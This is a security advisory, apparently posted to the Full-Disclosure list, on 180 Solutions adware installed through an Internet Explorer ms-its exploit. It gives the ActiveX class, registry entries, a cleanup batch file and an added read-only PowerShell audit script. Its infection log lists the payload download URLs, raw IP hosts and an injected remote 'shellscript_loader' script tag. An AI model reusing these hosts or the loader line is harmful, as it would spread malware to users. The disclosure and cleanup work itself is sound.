180 Solutions Exploits and Toolbars Hacking Patched Users
By Rafel Ivgi, The-Insider

Table Of Contents:
*********************
1. Class Name
2. Infecting Files
3. Related Registry Entries
4. Cleaner
5. Solution
6. Visit : http://theinsider.deep-ice.com

1. Class Name: iiittt Class
****************************

*Comment : All actions performed on your machine are logged in the following hidden file:
C:\WINDOWS\system32\log.bak.txt

Class Id : {FE1A240F-B247-4E06-A600-30E28F5AF3A0}
Downloading c:\install.cab
Executing c:\install.htm

2. Infecting Files:
********************
http://bis.180solutions.com/config.aspx?did=565&ver=5.4&duid=!!generate!!&partner_id=&product_id=&browser_ok=y&rnd=34&basename=msbb&SID=YJGHCHUV&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=42033152&TVM=2147352576&AVM=2084216832&FDS=1542299648&LAD=1601:1:1:0:0:0&WE=5
http://downloads.180solutions.com/keywords/kyf.258.gz to c:\windows\system32\kyf.dat
http://installs.180solutions.com/downloads/boom/2.0/RBoomerang.1 to C:\WINDOWS\abolaror.exe
http://bis.180solutions.com/config.aspx?did=565&ver=5.4&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=26&basename=msbb&SID=AZWDUFMF&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=49520640&TVM=2147352576&AVM=2070482944&FDS=1538985984&LAD=1601:1:1:0:0:0&WE=5
c:\windows\system32\FLEOK\msbb.exe from http://installs.180solutions.com/downloads/5.6/msbb.exe
http://installs.180solutions.com/downloads/5.6/msbb.exe to c:\windows\system32\FLEOK\msbb.exe
http://bis.180solutions.com/config.aspx?did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=9&basename=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&SID=NYBQFSPS&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=70152192&TVM=2147352576&AVM=2070474752&FDS=1538723840&LAD=1601:1:1:0:0:0&WE=5&TCA=0&SCA=0&MRDS=0
http://installs.180solutions.com/Downloads/DLL/3.0/ncmyb.dll to c:\windows\system32\FLEOK\ncmyb.dll
http://tv.180solutions.com/showme.aspx?keyword=.tightasianass.com&did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=32&basename=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&bid=0&SID=NYBQFSPS&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=61321216&TVM=2147352576&AVM=2051579904&FDS=1538109440&LAD=1601:1:1:0:0:0&WE=5
http://216.130.188.219/ei2/index.html
http://69.42.67.154/topbucks/tp2/index.html
http://216.130.188.219/ei2/installer.htm
http://69.42.67.154/topbucks/tp2/index.html
<SCRIPT%20SRC=\'http://216.130.188.219/ei2/shellscript_loader_js.php?ref=undefined\'></SCRIPT>
http://exits.freepornpics.com/timed_exits/straight_timed_pop.htm
http://216.130.188.219/ei2/index.html
http://69.42.67.154/_mpbfpas/free_trial_multisite/index.html
http://tv.180solutions.com/showme.aspx?keyword=trial&did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=23&basename=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&bid=0&SID=NYBQFSPS&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=37040128&TVM=2147352576&AVM=2031108096&FDS=1536757760&LAD=1601:1:1:0:0:0&WE=5
http://exits.freepornpics.com/timed_exits/fpa_pinkpays.html
http://www.i-lookup.com/index1.php

3. Related Registry Entries:
******************************
[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}]
@="iiittt Class"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Control]

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Implemented Categories]

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}]

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\InprocServer32]
@="C:\\WINDOWS\\System32\\windec32.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\MiscStatus]
@="0"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\MiscStatus\1]
@="131473"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\ProgID]
@="windec.iiittt.1"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Programmable]

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\ToolboxBitmap32]
@="C:\\WINDOWS\\System32\\windec32.dll, 102"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\TypeLib]
@="{660B38CB-6349-4C67-A418-AADABAE09C38}"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Version]
@="1.0"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\VersionIndependentProgID]
@="windec.iiittt"

[HKEY_CLASSES_ROOT\windec.iiittt]
@="iiittt Class"

[HKEY_CLASSES_ROOT\windec.iiittt\CLSID]
@="{FE1A240F-B247-4E06-A600-30E28F5AF3A0}"

[HKEY_CLASSES_ROOT\windec.iiittt\CurVer]
@="windec.iiittt.1"

[HKEY_CLASSES_ROOT\windec.iiittt.1]
@="iiittt Class"

[HKEY_CLASSES_ROOT\windec.iiittt.1\CLSID]
@="{FE1A240F-B247-4E06-A600-30E28F5AF3A0}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}]
"SystemComponent"=dword:00000000
"Installer"="MSICD"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Contains]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Contains\Files]
"C:\\WINDOWS\\System32\\windec32.dll"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\DownloadInformation]
"CODEBASE"="file://C:\\install.cab"
"INF"="C:\\WINDOWS\\Downloaded Program Files\\windec32.inf"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\InstalledVersion]
@="2,0,0,0"

4. Cleaner:
*************
Filename=180killer.bat:
-------------------------------------------CUT HERE-------------------------------------------------
rem Stop the browser, the shell and the COM surrogate so the dropped files can be deleted
taskkill /f /im iexplore.exe
taskkill /f /im explorer.exe
taskkill /f /im dllhost.exe
rem Remove the installer and every component it downloaded
del c:\install.htm
del c:\install.cab
taskkill /f /im abolaror.exe
del C:\WINDOWS\abolaror.exe
taskkill /f /im msbb.exe
del c:\windows\system32\FLEOK\msbb.exe
taskkill /f /im apconaj.exe
del c:\windows\system32\apconaj.exe
taskkill /f /im alchem.exe
del c:\windows\alchem.exe
rmdir /s /q c:\windows\system32\FLEOK
rmdir /s /q c:\windows\sbnet
del C:\WINDOWS\System32\windec32.dll
rem Restart the shell
explorer.exe
rem Remove the autostart entries
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v ShowBehind /f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v msbb /f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v abolaror /f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v chiqarsfneg /f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v alchem /f
-------------------------------------------CUT HERE-------------------------------------------------

5. Solution:
*************
The execution of this Internet Explorer exploit was caused by ms-its [even patched].
The ms-its protocol is not needed for normal Windows operation, therefore it should be removed.

XPLizer - Windows Hardening Frontend Tool - updated for removing the ms-its protocol.
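A read-only audit of the indicators listed in sections 1 to 4, together with a check for whether the ms-its protocol handler named in the solution is still registered. This is an added PowerShell example, not code from the advisory or from XPLizer. It assumes the file paths given on the page, with the Windows directory taken from $env:SystemRoot instead of a hardcoded C:\WINDOWS, and it assumes the standard HKCR\PROTOCOLS\Handler\<scheme> location where Internet Explorer registers asynchronous pluggable protocol handlers. It reports and deletes nothing, so it can be run before and after 180killer.bat to confirm what was present and what was cleaned.

```powershell
# Added example, not part of the advisory or of XPLizer: read-only audit for the
# indicators listed in sections 1-4 and for the ms-its protocol handler.
# Run from an elevated prompt. It reports only; nothing is deleted.

$clsid = '{FE1A240F-B247-4E06-A600-30E28F5AF3A0}'
$sys32 = Join-Path $env:SystemRoot 'System32'

# Files named on the page (Windows directory taken from $env:SystemRoot).
$files = @(
    (Join-Path $env:SystemDrive 'install.cab'),
    (Join-Path $env:SystemDrive 'install.htm'),
    (Join-Path $sys32 'windec32.dll'),
    (Join-Path $sys32 'log.bak.txt'),
    (Join-Path $sys32 'kyf.dat'),
    (Join-Path $sys32 'FLEOK\msbb.exe'),
    (Join-Path $sys32 'FLEOK\ncmyb.dll'),
    (Join-Path $sys32 'apconaj.exe'),
    (Join-Path $env:SystemRoot 'abolaror.exe'),
    (Join-Path $env:SystemRoot 'alchem.exe'),
    (Join-Path $env:SystemRoot 'Downloaded Program Files\windec32.inf')
)

# Registry keys from section 3; the Run values are the ones 180killer.bat removes.
$keys = @(
    "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid",
    'Registry::HKEY_CLASSES_ROOT\windec.iiittt',
    'Registry::HKEY_CLASSES_ROOT\windec.iiittt.1',
    "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\$clsid"
)
$runKey    = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
$runValues = 'ShowBehind', 'msbb', 'abolaror', 'chiqarsfneg', 'alchem'

$findings = New-Object System.Collections.Generic.List[string]

foreach ($f in $files) {
    # -Force so the hidden log file is found as well
    if (Get-Item -LiteralPath $f -Force -ErrorAction SilentlyContinue) {
        $findings.Add("file present: $f")
    }
}

foreach ($k in $keys) {
    if (Test-Path -LiteralPath $k) { $findings.Add("registry key present: $k") }
}

# The control's in-process DLL and the cab it was installed from, if those keys exist.
$inproc = "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\InprocServer32"
if (Test-Path -LiteralPath $inproc) {
    $dll = (Get-ItemProperty -LiteralPath $inproc).'(default)'
    $findings.Add("InprocServer32 for $clsid -> $dll")
}
$dlinfo = "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\$clsid\DownloadInformation"
if (Test-Path -LiteralPath $dlinfo) {
    $cb = (Get-ItemProperty -LiteralPath $dlinfo).CODEBASE
    $findings.Add("Code Store CODEBASE for $clsid -> $cb")
}

if (Test-Path -LiteralPath $runKey) {
    $run = Get-ItemProperty -LiteralPath $runKey
    foreach ($v in $runValues) {
        if ($null -ne $run.PSObject.Properties[$v]) {
            $findings.Add("Run value '$v' -> $($run.$v)")
        }
    }
}

# Section 5 attributes execution to the ms-its protocol. Asynchronous pluggable
# protocol handlers are registered under HKCR\PROTOCOLS\Handler\<scheme>, so the
# presence of this key means the handler is still reachable from the browser.
$handler = 'Registry::HKEY_CLASSES_ROOT\PROTOCOLS\Handler\ms-its'
if (Test-Path -LiteralPath $handler) {
    $h = Get-ItemProperty -LiteralPath $handler
    $findings.Add("ms-its protocol handler registered (CLSID $($h.CLSID))")
}

if ($findings.Count -eq 0) {
    Write-Output 'No indicators from the advisory found.'
    exit 0
}
$findings | ForEach-Object { Write-Output "[!] $_" }
exit 1
```

The script exits non-zero when anything is found, so it can be dropped into a login script or a fleet-wide check and its exit code collected. A clean result after running 180killer.bat but with the ms-its handler still reported means the infection vector the author describes is still open, which is the case XPLizer is meant to close.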
http://www.securiteam.com/tools/5EP081FCKI.html

The sources of XPLizer can be found at http://theinsider.deep-ice.com/xplizer-src.zip
An executable version can be found at http://theinsider.deep-ice.com/xplizer.zip
The official readme file for XPLizer can be found at http://theinsider.deep-ice.com/readme.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html